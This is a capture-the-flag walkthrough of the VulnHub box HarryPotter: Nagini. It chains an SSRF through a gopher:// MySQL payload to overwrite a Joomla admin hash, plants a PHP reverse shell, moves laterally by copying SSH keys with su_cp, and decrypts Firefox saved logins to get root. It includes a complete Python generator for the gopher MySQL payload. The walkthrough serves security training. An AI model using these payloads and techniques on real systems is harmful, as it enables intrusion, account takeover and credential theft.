VulnHub: HarryPotter: Nagini

Today we will take a look at VulnHub: Nagini. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open --open

  • Gobuster

Command: gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

Gobuster found a file here, note.txt, with the following contents:

Hello developers!!

I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.


The note points to an HTTP/3 (QUIC) server, which a normal browser or curl will not talk to by default, so let's research an HTTP/3 client. The hostname quic.nagini.hogwarts is not in public DNS, so it has to be mapped to the target in /etc/hosts first.

Let's download the client and build it from the project's examples.

Command: git clone --recursive

Command: cargo build --examples

Command: cd target/debug/examples

Command: ./http3-client

<title>Information Page</title>
Greetings Developers!!

I am having two announcements that I need to share with you:

1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers. So I will be removing the same by this week.
2. All developers are requested not to put any configuration’s backup file (.bak) in main production servers as they are readable by every one.


When we open /internalResourceFeTcher.php, we see a button. I first tried command injection, which did not work, so I suspected SSRF instead. To test it I submitted my own input, and here is the result:

Gobuster also found the /joomla directory. The .bak file mentioned in the announcement should be somewhere under it. Let's check with joomscan:

Command: joomscan -u

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.25

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page :

[+] Checking robots.txt existing
[++] robots.txt is found
path :

Interesting path found from robots.txt

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path :

Let’s download the .bak file and look at its contents.

The part we need:

public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'goblin';
public $password = '';
public $db = 'joomla';
public $dbprefix = 'joomla_';

So we have an SSRF and, from the backup, database credentials: the user goblin with an empty password, connecting on localhost. Through the SSRF we can make the web server talk to that database for us and both read and change its data.

For this we will use this tool, which turns a MySQL login and query into a gopher:// URL for the fetcher:

Command: git clone

Command: python2 --exploit mysql

Enter the database user (goblin) and the query we want to run.

Paste the generated gopher:// URL into the fetcher and press the button; the query result comes back in the response.

Now we query for more detail, such as the users and their password hashes.

I tried to crack the hash but could not, so I will overwrite it instead. The value below is the unsalted MD5 of "password", which Joomla 3.x still accepts as a legacy hash:

Command: use joomla;update joomla_users set password='5f4dcc3b5aa765d61d8327deb882cf99' where username='site_admin'

Here is the password changed. Let’s log in as an administrator.
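The tool above hides what is actually sent. As an added example (this is not code from the original writeup, nor the tool's own code), the following Python builds the same kind of gopher:// payload by hand: the raw MySQL client packets (login, query, quit), percent-encoded so the SSRF-vulnerable fetcher replays them to localhost:3306. It assumes the fetcher hands gopher:// URLs to a client that decodes the selector including %00 bytes (the writeup confirms that works on this box), that the target user has an empty password as goblin does here, and that the server uses mysql_native_password. The empty password is what makes blind, one-way delivery possible: we never see the server's salt, but an empty password scrambles to an empty auth response. The block also computes the MD5 hash used in the UPDATE so its origin is visible.

```python
"""Build a gopher:// URL that makes an SSRF-vulnerable fetcher speak MySQL.

Added example, not the writeup author's code nor the tool's. The bytes are the
client side of a MySQL session: HandshakeResponse41 (login), COM_QUERY, COM_QUIT.
Because the fetcher replays them blindly we never see the server greeting, so
this only works for a user with an EMPTY password (as goblin has here).
"""
import hashlib
import struct
from urllib.parse import quote

# Client capability flags from the MySQL client/server protocol.
CLIENT_LONG_PASSWORD     = 0x00000001
CLIENT_LONG_FLAG         = 0x00000004
CLIENT_PROTOCOL_41       = 0x00000200
CLIENT_TRANSACTIONS      = 0x00002000
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_MULTI_STATEMENTS  = 0x00010000   # lets "use joomla;update ..." go as one query
CLIENT_MULTI_RESULTS     = 0x00020000
CLIENT_PLUGIN_AUTH       = 0x00080000

CAPABILITIES = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_PROTOCOL_41
                | CLIENT_TRANSACTIONS | CLIENT_SECURE_CONNECTION
                | CLIENT_MULTI_STATEMENTS | CLIENT_MULTI_RESULTS
                | CLIENT_PLUGIN_AUTH)
MAX_PACKET = 0x01000000            # 16 MiB
CHARSET_UTF8_GENERAL_CI = 0x21
COM_QUIT, COM_QUERY = 0x01, 0x03


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """MySQL packet framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    if len(payload) >= 0xFFFFFF:
        raise ValueError("payload needs multi-packet splitting")
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def handshake_response(username: str) -> bytes:
    """HandshakeResponse41 for a user with no password.

    mysql_native_password scrambles the password with the server's 20-byte salt;
    an empty password scrambles to an empty string, so the auth-response length
    is 0 and the salt we never saw does not matter.
    """
    return (struct.pack("<I", CAPABILITIES)
            + struct.pack("<I", MAX_PACKET)
            + bytes([CHARSET_UTF8_GENERAL_CI])
            + b"\x00" * 23                      # reserved
            + username.encode() + b"\x00"
            + b"\x00"                           # auth-response length: 0 bytes
            + b"mysql_native_password\x00")     # auth plugin name (CLIENT_PLUGIN_AUTH)


def mysql_stream(username: str, queries) -> bytes:
    """Everything the client would send. The login is sequence id 1 (it answers the
    server greeting, id 0); each later command starts a new sequence at 0."""
    data = mysql_packet(handshake_response(username), 1)
    for q in queries:
        data += mysql_packet(bytes([COM_QUERY]) + q.encode(), 0)
    return data + mysql_packet(bytes([COM_QUIT]), 0)


def gopher_url(raw: bytes, host: str = "127.0.0.1", port: int = 3306) -> str:
    """gopher://host:port/_<selector>. The character after '/' is the gopher item
    type, which the client strips; '_' is only a placeholder. Percent-encoding every
    byte keeps NULs and newlines intact until the fetcher decodes the selector."""
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")


def joomla_legacy_md5(password: str) -> str:
    """Joomla 3.x still verifies an unsalted MD5 hash (and re-hashes it with bcrypt
    on the next successful login), which is why the UPDATE in the writeup works."""
    return hashlib.md5(password.encode()).hexdigest()


if __name__ == "__main__":
    new_hash = joomla_legacy_md5("password")    # 5f4dcc3b5aa765d61d8327deb882cf99
    query = ("use joomla;update joomla_users set password='%s' "
             "where username='site_admin'" % new_hash)
    print(gopher_url(mysql_stream("goblin", [query])))
```

Running the script prints one long URL; paste it into the fetcher exactly as the writeup does with the tool's output. Two caveats: the two statements travel in one COM_QUERY only because CLIENT_MULTI_STATEMENTS is set, and a MySQL 8 server whose default plugin is caching_sha2_password would answer the login with an AuthSwitchRequest that a blind gopher payload cannot respond to, so this relies on mysql_native_password as on this box.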

Get reverse shell

Extensions -> Templates -> Protostar -> New File

Put your own IP address and port into a PHP reverse shell, paste it into the new file and save it. With a listener waiting, browse to the file on the target:

Url: http://<target>/joomla/templates/protostar/rev.php

Once the shell connects back, upgrade it to a proper TTY:

Command: script /dev/null -c bash

Command: export TERM=xterm

  • Snape

Command: cd /home/snape

Command: cat .creds.txt

The file is base64-encoded; decode it and we get the password:

Pass: Love@lilly

Command: su snape

  • Hermione

Command: ssh-keygen -f hermoine

Command: python3 -m http.server 80

On the target, fetch the public key we just generated:

Command: cd /home/snape/

Command: wget

Command: mv authorized_keys

Command: chmod 640 authorized_keys

Command: cd /home/hermoine/bin/

Command: ./su_cp -p -r /home/snape/authorized_keys /home/hermoine/.ssh/

su_cp is a copy of cp that is able to write into hermoine's .ssh directory, which snape cannot do directly. The chmod above matters: -p preserves the 640 mode on the copy, and sshd (with StrictModes, the default) refuses an authorized_keys file that is group- or world-writable.

  • SSH

Command: ssh hermoine@ -i hermoine

  • Root

There is a .mozilla folder in hermoine's home directory. Looking inside the Firefox profile, I was confronted with the following:

Command: cd /home/hermoine/.mozilla/firefox/g2mhbq0o.default



I need to transfer these two files to my local machine to crack the passwords.

Command: python3 -m http.server

I will use this tool to decrypt the saved logins:

Command: git clone

Command: sudo pip install -r requirements.txt

After downloading the two files from the target machine, run the tool against them:

Command: python

Here we find the root password.

Command: su root

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."


